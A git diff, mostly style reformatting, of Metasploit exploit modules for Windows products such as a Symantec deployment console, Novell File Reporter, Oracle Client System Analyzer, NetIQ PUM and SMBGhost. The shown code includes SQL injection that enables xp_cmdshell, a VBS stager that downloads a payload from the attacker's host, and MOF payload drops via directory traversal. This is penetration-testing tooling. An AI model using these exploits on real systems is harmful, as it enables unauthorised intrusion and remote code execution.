+        'Privileged' => true,
+        'Platform' => 'win',
+        'DisclosureDate' => '2008-05-15',
+        'DefaultTarget' => 0
+      )
+     )
 
     register_options(
-    [
-      Opt::RPORT(402),
-      OptBool.new('XP_CMDSHELL',      [ true, "Enable xp_cmdshell prior to exploit", true]),
-      OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
-      OptBool.new('ENABLE_SECURITY',  [ true, "Enable Local Deployment Console Authentication", false ])
-    ])
+      [
+        Opt::RPORT(402),
+        OptBool.new('XP_CMDSHELL', [ true, "Enable xp_cmdshell prior to exploit", true]),
+        OptBool.new('DISABLE_SECURITY', [ true, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
+        OptBool.new('ENABLE_SECURITY', [ true, "Enable Local Deployment Console Authentication", false ])
+      ]
+    )
     deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
 
     self.needs_cleanup = true
   end
 
   def execute_command(cmd, opts = {})
-    inject=[]
+    inject = []
 
     if @xp_shell_enable
-      inject+=[
-        "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}",
-        "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}",
+      inject += [
+        "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure", '')}",
+        "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure", '')}",
       ]
       @xp_shell_enable = false
     end
 
     if @wc_disable_security
-      inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"]
+      inject += ["#{Rex::Text.to_hex("wc_upd_disable_security", '')}"]
       @wc_disable_security = false
     end
 
     if @wc_enable_security
-      inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"]
+      inject += ["#{Rex::Text.to_hex("wc_upd_enable_security", '')}"]
       @wc_enable_security = false
     end
 
-    inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil
+    inject += ["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd %TEMP% && cmd.exe /c #{cmd}\'", '')}"] if cmd != nil
 
     inject.each do |sqli|
       send_update_computer("2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--")
     end
   end
 
- def send_update_computer(processor_speed)
-   notification = %Q|Request=UpdateComputer
+  def send_update_computer(processor_speed)
+    notification = %Q|Request=UpdateComputer
 OS-Bit=32
 CPU-Arch=x86
 IP-Address=192.168.20.107
@@ -111,18 +113,18 @@ Processor-Speed=#{processor_speed}
    \x00
    |
 
-   connect
-   sock.put(notification)
-   response = sock.get_once()
-   disconnect
+    connect
+    sock.put(notification)
+    response = sock.get_once()
+    disconnect
 
-   return response
- end
+    return response
+  end
 
   def check
     res = send_update_computer("2659")
 
-    unless res and res =~ /Result=Success/ and res=~ /DSVersion=(.*)/
+    unless res and res =~ /Result=Success/ and res =~ /DSVersion=(.*)/
       return Exploit::CheckCode::Unknown
     end
 
@@ -144,8 +146,8 @@ Processor-Speed=#{processor_speed}
         return Exploit::CheckCode::Appears
       end
     elsif minor == 9 and build < 176
-      #The existence of versions matching this profile is a possibility... none were observed in the wild though
-      #as such, we're basing confidence off of Symantec's vulnerability bulletin.
+      # The existence of versions matching this profile is a possibility... none were observed in the wild though
+      # as such, we're basing confidence off of Symantec's vulnerability bulletin.
       return Exploit::CheckCode::Appears
     end
 
@@ -160,18 +162,18 @@ Processor-Speed=#{processor_speed}
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
-    execute_cmdstager({:delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp})
+    execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp })
   end
 
   def on_new_session(client)
     return if not stager_instance.payload_exe
 
-    #can't scrub dropped payload while the process is still active so...
-    #iterate through process list, find our process and the associated
-    #parent process ID, Kill the parent.
-    #This module doesn't use FileDropper because of timing issues when
-    #using migrate -f and FileDropper. On the other hand PrependMigrate
-    #has been avoided because of older issues with reverse_https payload
+    # can't scrub dropped payload while the process is still active so...
+    # iterate through process list, find our process and the associated
+    # parent process ID, Kill the parent.
+    # This module doesn't use FileDropper because of timing issues when
+    # using migrate -f and FileDropper. On the other hand PrependMigrate
+    # has been avoided because of older issues with reverse_https payload
 
     unless client.type == "meterpreter"
       print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")
@@ -186,7 +188,7 @@ Processor-Speed=#{processor_speed}
     print_status("Kill parent process ...")
     client.sys.process.get_processes().each do |proc|
       if proc['pid'] == client.sys.process.open.pid
-          client.sys.process.kill(proc['ppid'])
+        client.sys.process.kill(proc['ppid'])
       end
     end
 

--- a/modules/exploits/windows/nimsoft/nimcontroller_bof.rb
+++ b/modules/exploits/windows/nimsoft/nimcontroller_bof.rb
@@ -23,41 +23,36 @@ class MetasploitModule < Msf::Exploit::Remote
           directory_list probe.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'wetw0rk' # Vulnerability Discovery and Metasploit module
-          ],
-        'References' =>
-          [
-            [ 'CVE', '2020-8010' ], # CA UIM Probe Improper ACL Handling RCE (Multiple Attack Vectors)
-            [ 'CVE', '2020-8012' ], # CA UIM nimbuscontroller Buffer Overflow RCE
-            [ 'URL', 'https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832' ],
-            [ 'PACKETSTORM', '156577' ]
-          ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'process',
-            'AUTORUNSCRIPT' => 'post/windows/manage/migrate'
-          },
-        'Payload' =>
-          {
-            'Space' => 2000,
-            'DisableNops' => true
-          },
+        'Author' => [
+          'wetw0rk' # Vulnerability Discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2020-8010' ], # CA UIM Probe Improper ACL Handling RCE (Multiple Attack Vectors)
+          [ 'CVE', '2020-8012' ], # CA UIM nimbuscontroller Buffer Overflow RCE
+          [ 'URL', 'https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832' ],
+          [ 'PACKETSTORM', '156577' ]
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'process',
+          'AUTORUNSCRIPT' => 'post/windows/manage/migrate'
+        },
+        'Payload' => {
+          'Space' => 2000,
+          'DisableNops' => true
+        },
         'Platform' => 'win',
         'Arch' => ARCH_X64,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows Universal (x64) - v7.80.3132',
-              {
-                'Platform' => 'win',
-                'Arch' => [ARCH_X64],
-                'Version' => '7.80 [Build 7.80.3132, Jun  1 2015]',
-                'Ret' => 0x000000014006fd3d # pop rsp; or al, 0x00; add rsp, 0x0000000000000448 ; ret [controller.exe]
-              }
-            ],
+            'Windows Universal (x64) - v7.80.3132',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'Version' => '7.80 [Build 7.80.3132, Jun  1 2015]',
+              'Ret' => 0x000000014006fd3d # pop rsp; or al, 0x00; add rsp, 0x0000000000000448 ; ret [controller.exe]
+            }
           ],
+        ],
         'Privileged' => true,
         'Notes' => { 'Stability' => [ CRASH_SAFE ] },
         'DisclosureDate' => '2020-02-05',

--- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
+++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
@@ -11,55 +11,54 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::WbemExec
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'NFR Agent FSFUI Record File Upload RCE',
-      'Description'    => %q{
-        NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload
-        arbitrary files via a directory traversal while handling requests to /FSF/CMD with
-        FSFUI records with UICMD 130. This module has been tested successfully against NFR
-        Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'NFR Agent FSFUI Record File Upload RCE',
+        'Description' => %q{
+          NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload
+          arbitrary files via a directory traversal while handling requests to /FSF/CMD with
+          FSFUI records with UICMD 130. This module has been tested successfully against NFR
+          Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'juan vazquez'
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2012-4959'],
           [ 'OSVDB', '87573' ],
           [ 'URL', 'https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]
         ],
-      'Payload'        =>
-        {
-          'Space'           => 2048,
+        'Payload' => {
+          'Space' => 2048,
           'StackAdjustment' => -3500
         },
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'WfsDelay' => 20
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          #Windows before Vista
-          [ 'Automatic', { } ]
+        'Platform' => 'win',
+        'Targets' => [
+          # Windows before Vista
+          [ 'Automatic', {} ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2012-11-16'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2012-11-16'
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(3037),
         OptBool.new('SSL', [true, 'Use SSL', true]),
         OptInt.new('DEPTH', [true, 'Traversal depth', 6])
-      ])
+      ]
+    )
 
     self.needs_cleanup = true
   end
 
   def on_new_session(client)
-
     return if not @var_mof_name
     return if not @var_vbs_name
 
@@ -80,21 +79,19 @@ class MetasploitModule < Msf::Exploit::Remote
       client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
       print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
       cmd = "#{windir}\\system32\\attrib.exe -r " +
-        "#{windir}\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof"
-      client.sys.process.execute(cmd, nil, {'Hidden' => true })
+            "#{windir}\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof"
+      client.sys.process.execute(cmd, nil, { 'Hidden' => true })
       client.fs.file.rm("#{windir}\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof")
     rescue ::Exception => e
       print_error("Exception: #{e.inspect}")
     end
-
   end
 
   def exploit
-
     # In order to save binary data to the file system the payload is written to a .vbs
     # file and execute it from there.
-    @var_mof_name = rand_text_alpha(rand(5)+5)
-    @var_vbs_name = rand_text_alpha(rand(5)+5)
+    @var_mof_name = rand_text_alpha(rand(5) + 5)
+    @var_vbs_name = rand_text_alpha(rand(5) + 5)
 
     print_status("Encoding payload into VBS...")
     payload = generate_payload_exe
@@ -123,12 +120,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       {
-        'uri'     => '/FSF/CMD',
+        'uri' => '/FSF/CMD',
         'version' => '1.1',
-        'method'  => 'POST',
-        'ctype'   => "text/xml",
-        'data'    => message
-      })
+        'method' => 'POST',
+        'ctype' => "text/xml",
+        'data' => message
+      }
+    )
 
     if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>"
       print_warning("File successfully uploaded: #{filename}")

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -13,47 +12,48 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',
+        'Description' => %q{
           This module abuses a lack of authorization in the NetIQ Privileged User Manager
-        service (unifid.exe) to execute arbitrary perl code. The problem exists in the
-        ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over
-        Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.
-      },
-      'Author'         => [
-        'rgod', # Vulnerability discovery and PoC
-        'juan vazquez' # Metasploit module
-      ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          service (unifid.exe) to execute arbitrary perl code. The problem exists in the
+          ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over
+          Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.
+        },
+        'Author' => [
+          'rgod', # Vulnerability discovery and PoC
+          'juan vazquez' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2012-5932' ],
           [ 'OSVDB', '87334' ],
           [ 'BID', '56539' ],
           [ 'EDB', '22738' ]
         ],
-      'Payload'        =>
-        {
-          'Space'           => 2048,
+        'Payload' => {
+          'Space' => 2048,
           'StackAdjustment' => -3500
         },
-      'Platform'       => 'win',
-      'Privileged'     => true,
-      'Targets'        =>
-        [
-          ['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', { }],
+        'Platform' => 'win',
+        'Privileged' => true,
+        'Targets' => [
+          ['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', {}],
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2012-11-15'
-    ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2012-11-15'
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(443),
         OptBool.new('SSL', [true, 'Use SSL', true]),
         OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])
-      ])
+      ]
+    )
 
     self.needs_cleanup = true
   end
@@ -65,21 +65,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       {
-        'uri'     => '/',
+        'uri' => '/',
         'version' => '1.1',
-        'method'  => 'POST',
-        'ctype'   => "application/x-amf",
+        'method' => 'POST',
+        'ctype' => "application/x-amf",
         'headers' => {
           "x-flash-version" => "11,4,402,278"
         },
-        'data'    => data,
-      })
+        'data' => data,
+      }
+    )
 
     if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2\.3\.1/
       return Exploit::CheckCode::Appears
     elsif res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/
       return Exploit::CheckCode::Detected
     end
+
     return Exploit::CheckCode::Safe
   end
 
@@ -107,12 +109,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       end
     end
-
   end
 
   # Handle incoming requests from the target
   def on_request_uri(cli, request)
-
     vprint_status("on_request_uri called")
 
     if (not @exe_data)
@@ -148,21 +148,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     data = fake_login
 
     print_status("Sending fake login request...")
     res = send_request_cgi(
       {
-        'uri'     => '/',
+        'uri' => '/',
         'version' => '1.1',
-        'method'  => 'POST',
-        'ctype'   => "application/x-amf",
+        'method' => 'POST',
+        'ctype' => "application/x-amf",
         'headers' => {
           "x-flash-version" => "11,4,402,278"
         },
-        'data'    => data,
-      })
+        'data' => data,
+      }
+    )
 
     if not res or res.code != 200 or res.body !~ /svc(.+)/
       fail_with(Failure::Unknown, 'Fake Login failed, svc not identified')
@@ -175,23 +175,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Generating the EXE Payload...")
     @exe_data = generate_payload_exe
-    exename = Rex::Text.rand_text_alpha(1+rand(2))
+    exename = Rex::Text.rand_text_alpha(1 + rand(2))
 
     print_status("Setting up the Web Service...")
     datastore['SSL'] = false
     resource_uri = '/' + exename + '.exe'
     service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
     print_status("Starting up our web service on #{service_url} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => resource_uri
-    }})
+    start_service({
+      'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
+      }
+    })
     datastore['SSL'] = true
 
     # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
-    vbs_stage = Rex::Text.rand_text_alpha(3+rand(5))
+    vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
     code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
     code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
     code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
@@ -255,15 +257,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       {
-        'uri'     => '/',
+        'uri' => '/',
         'version' => '1.1',
-        'method'  => 'POST',
-        'ctype'   => "application/x-amf",
+        'method' => 'POST',
+        'ctype' => "application/x-amf",
         'headers' => {
           "x-flash-version" => "11,4,402,278"
         },
-        'data'    => data,
-      })
+        'data' => data,
+      }
+    )
 
     if res
       fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
@@ -288,6 +291,5 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Shutting down the web service...")
     stop_service
-
   end
 end

--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@@ -9,47 +9,48 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::Nuuo
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
-      'Description'    => %q{
-      The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
-      CMS Server.
-      The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
-      characters. Therefore, this function can be abused to overwrite any files in the installation
-      drive of CMS Server.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
+        'Description' => %q{
+          The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
+          CMS Server.
+          The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\..\)
+          characters. Therefore, this function can be abused to overwrite any files in the installation
+          drive of CMS Server.
 
-      This vulnerability is exploitable in CMS versions up to and including v2.4.
+          This vulnerability is exploitable in CMS versions up to and including v2.4.
 
-      This module will either use a provided session number (which can be guessed with an auxiliary
-      module) or attempt to login using a provided username and password - it will also try the
-      default credentials if nothing is provided.
+          This module will either use a provided session number (which can be guessed with an auxiliary
+          module) or attempt to login using a provided username and password - it will also try the
+          default credentials if nothing is provided.
 
-      This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
-      fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
-      not execute successfully.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+          This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
+          fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
+          not execute successfully.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2018-17936' ],
           [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
           [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
         ],
-      'Platform'       => 'win',
-      'Arch'           => ARCH_X86,
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'Targets' => [
           [ 'Nuuo Central Management Server <= v2.4.0', {} ],
         ],
-      'Privileged'     => true,
-      'DisclosureDate' => '2018-10-11',
-      'DefaultTarget'  => 0))
+        'Privileged' => true,
+        'DisclosureDate' => '2018-10-11',
+        'DefaultTarget' => 0
+      )
+    )
 
     self.needs_cleanup = true
   end

--- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb
+++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb
@@ -13,51 +13,51 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::WbemExec
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle Database Client System Analyzer Arbitrary File Upload',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle Database Client System Analyzer Arbitrary File Upload',
+        'Description' => %q{
           This module exploits an arbitrary file upload vulnerability on the Client
-        Analyzer component as included in Oracle Database 11g, which allows remote
-        attackers to upload and execute arbitrary code. This module has been tested
-        successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution
-        through the Windows Management Instrumentation service has been used.
-      },
-      'Author'         =>
-        [
+          Analyzer component as included in Oracle Database 11g, which allows remote
+          attackers to upload and execute arbitrary code. This module has been tested
+          successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution
+          through the Windows Management Instrumentation service has been used.
+        },
+        'Author' => [
           '1c239c43f521145fa8385d64a9c32243', # Vulnerability discovery
           'juan vazquez' # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'Platform'       => [ 'win' ],
-      'Privileged'     => true,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'Platform' => [ 'win' ],
+        'Privileged' => true,
+        'References' => [
           [ 'CVE', '2010-3600' ],
           [ 'OSVDB', '70546'],
           [ 'BID', '45883'],
           [ 'ZDI', '11-018' ],
           [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ]
         ],
-      'Targets'        =>
-        [
+        'Targets' => [
           [ 'Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2', {} ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2011-01-18'
-    ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2011-01-18'
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(1158),
         OptBool.new('SSL', [true, 'Use SSL', true]),
         OptInt.new('DEPTH', [true, 'Traversal depth to reach the root', 13])
-      ])
+      ]
+    )
 
     self.needs_cleanup = true
   end
 
   def on_new_session(client)
-
     return if not @var_mof_name
     return if not @var_vbs_name
 
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cmd = attrib_path + mof_path
 
-    client.sys.process.execute(cmd, nil, {'Hidden' => true })
+    client.sys.process.execute(cmd, nil, { 'Hidden' => true })
 
     begin
       print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...")
@@ -87,24 +87,23 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Exception => e
       print_error("Exception: #{e.inspect}")
     end
-
   end
 
   def upload_file(data)
     res = send_request_cgi(
       {
-        'uri'     => '/em/ecm/csa/v10103/CSAr.jsp',
-        'method'  => 'POST',
-        'data'    => data
-      })
+        'uri' => '/em/ecm/csa/v10103/CSAr.jsp',
+        'method' => 'POST',
+        'data' => data
+      }
+    )
 
     return res
   end
 
   def check
-
-    file_name = rand_text_alpha(rand(5)+5)
-    file_contents = rand_text_alpha(rand(20)+20)
+    file_name = rand_text_alpha(rand(5) + 5)
+    file_contents = rand_text_alpha(rand(20) + 20)
 
     data = "sessionID=#{file_name}.txt\x00.xml"
     data << "\x0d\x0a"
@@ -118,22 +117,20 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Checking uploaded contents...")
-    res = send_request_raw({'uri' => "/em/CSA#{file_name}.txt"})
+    res = send_request_raw({ 'uri' => "/em/CSA#{file_name}.txt" })
 
     if res and res.code == 200 and res.body =~ /#{file_contents}/
       return Exploit::CheckCode::Vulnerable
     end
 
     return Exploit::CheckCode::Appears
-
   end
 
   def exploit
-
     # In order to save binary data to the file system the payload is written to a .vbs
     # file and execute it from there.
-    @var_mof_name = rand_text_alpha(rand(5)+5)
-    @var_vbs_name = rand_text_alpha(rand(5)+5)
+    @var_mof_name = rand_text_alpha(rand(5) + 5)
+    @var_vbs_name = rand_text_alpha(rand(5) + 5)
 
     print_status("Encoding payload into vbs...")
     # Only 100KB can be uploaded by default, because of this "to_win32pe_old" is used,
@@ -167,6 +164,5 @@ class MetasploitModule < Msf::Exploit::Remote
     if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/)
       fail_with(Failure::Unknown, 'MOF upload failed')
     end
-
   end
 end

--- a/modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb
+++ b/modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb
@@ -27,12 +27,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'DisclosureDate' => '2021-07-07',
-        'References' =>
-          [
-            ['CVE', '2020-7387'], # Infoleak
-            ['CVE', '2020-7388'], # RCE
-            ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
-          ],
+        'References' => [
+          ['CVE', '2020-7387'], # Infoleak
+          ['CVE', '2020-7388'], # RCE
+          ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
+        ],
         'Privileged' => true,
         'Platform' => 'win',
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],

--- a/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
+++ b/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
@@ -24,24 +24,22 @@ class MetasploitModule < Msf::Exploit::Remote
           This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
           'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module
         ],
-        'References' =>
-          [
-            [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'],
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'],
-            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'],
-            [ 'CVE', '2020-12027'],
-            [ 'CVE', '2020-12028'],
-            [ 'CVE', '2020-12029'],
-            [ 'ZDI', '20-727'],
-            [ 'ZDI', '20-728'],
-            [ 'ZDI', '20-729'],
-            [ 'ZDI', '20-730'],
-          ],
+        'References' => [
+          [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'],
+          [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'],
+          [ 'CVE', '2020-12027'],
+          [ 'CVE', '2020-12028'],
+          [ 'CVE', '2020-12029'],
+          [ 'ZDI', '20-727'],
+          [ 'ZDI', '20-728'],
+          [ 'ZDI', '20-729'],
+          [ 'ZDI', '20-730'],
+        ],
         'Privileged' => false,
         'Platform' => 'win',
         'Arch' => [ARCH_X86, ARCH_X64],
@@ -53,10 +51,9 @@ class MetasploitModule < Msf::Exploit::Remote
             }
         },
         'DefaultOptions' => { 'WfsDelay' => 20 },
-        'Targets' =>
-          [
-            [ 'Rockwell Automation FactoryTalk SE', {} ]
-          ],
+        'Targets' => [
+          [ 'Rockwell Automation FactoryTalk SE', {} ]
+        ],
         'DisclosureDate' => '2020-06-22',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb
+++ b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb
@@ -30,59 +30,53 @@ class MetasploitModule < Msf::Exploit::Remote
           in the context of the kernel, finally yielding a session as NT AUTHORITY\SYSTEM in spoolsv.exe. Exploitation
           can take a few minutes as the necessary data is gathered.
         },
-        'Author' =>
-        [
+        'Author' => [
           'hugeh0ge', # Ricerca Security research, detailed technique description
           'chompie1337', # PoC on which this module is based
           'Spencer McIntyre', # msf module
         ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            [ 'CVE', '2020-0796' ],
-            [ 'URL', 'https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html' ],
-            [ 'URL', 'https://github.com/chompie1337/SMBGhost_RCE_PoC' ],
-            # the rest are not cve-2020-0796 specific but are on topic regarding the techniques used within the exploit
-            [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],
-            [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],
